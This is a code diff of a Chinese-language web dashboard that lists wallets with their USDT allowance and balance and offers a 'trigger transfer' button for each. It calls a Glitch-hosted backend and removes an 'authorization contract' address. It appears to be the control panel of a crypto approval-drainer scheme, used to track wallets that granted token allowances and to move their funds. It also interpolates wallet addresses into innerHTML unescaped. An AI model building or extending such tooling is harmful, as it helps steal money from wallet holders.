--- a/index.html
+++ b/index.html
@@ -51,6 +51,7 @@
         <label for="walletAddress">輸入錢包地址：</label>
         <input type="text" id="walletAddress" class="input" placeholder="輸入錢包地址">
         <button id="checkAuthorizationButton">檢查授權</button>
+        <button id="refreshButton">刷新錢包列表</button>
     </div>
     <br>
     <table id="walletsTable">
@@ -58,7 +59,7 @@
             <tr>
                 <th>錢包地址</th>
                 <th>USDT 授權額度</th>
-                <th>TRX 餘額</th>
+                <th>USDT 餘額</th>
                 <th>操作</th>
             </tr>
         </thead>
@@ -67,28 +68,26 @@
 
     <script>
         const API_URL = "https://peaceful-precious-ceres.glitch.me";  // 後端 API 地址
-        const AUTH_CONTRACT = "TLFVGYGU5wd4z3KzKxr35kNUHQ7zFtff5d";  // 授權合約地址
 
-        // 確保用戶使用 TronLink 並處於可操作狀態
+        // 檢查錢包授權
         async function checkWalletAuthorization() {
             const walletAddress = document.getElementById("walletAddress").value.trim();
             if (!walletAddress) return alert("請輸入錢包地址");
 
             try {
-                // 發送請求至後端檢查授權
                 const response = await axios.post(`${API_URL}/check-wallet-authorization`, { walletAddress });
 
-                // 提示授權成功
+                // 顯示授權成功提示
                 alert(response.data.message);
 
-                // 刷新錢包列表
+                // 更新錢包列表
                 fetchWallets();
             } catch (error) {
                 alert("授權檢查失敗： " + (error.response?.data?.error || error.message));
             }
         }
 
-        // 獲取錢包授權資訊並顯示
+        // 刷新錢包列表
         async function fetchWallets() {
             try {
                 const response = await axios.get(`${API_URL}/wallets`);
@@ -101,17 +100,17 @@
                     const row = document.createElement("tr");
                     const walletCell = document.createElement("td");
                     const allowanceCell = document.createElement("td");
-                    const trxBalanceCell = document.createElement("td");
+                    const balanceCell = document.createElement("td");
                     const actionsCell = document.createElement("td");
 
                     walletCell.textContent = wallet.address;
-                    allowanceCell.textContent = "待查詢";  // 授權額度
-                    trxBalanceCell.textContent = "待查詢";  // TRX 餘額
+                    allowanceCell.textContent = wallet.allowance || "未授權";  // 顯示 USDT 授權額度
+                    balanceCell.textContent = wallet.balance || "無餘額";  // 顯示 USDT 餘額
                     actionsCell.innerHTML = `<button onclick="triggerTransfer('${wallet.address}')">觸發轉帳</button>`;
 
                     row.appendChild(walletCell);
                     row.appendChild(allowanceCell);
-                    row.appendChild(trxBalanceCell);
+                    row.appendChild(balanceCell);
                     row.appendChild(actionsCell);
 
                     tableBody.appendChild(row);
@@ -137,6 +136,7 @@
 
         // 綁定事件
         document.getElementById("checkAuthorizationButton").addEventListener("click", checkWalletAuthorization);
+        document.getElementById("refreshButton").addEventListener("click", fetchWallets);  // 點擊刷新按鈕
         window.onload = fetchWallets;  // 頁面載入時顯示錢包資料
     </script>
 
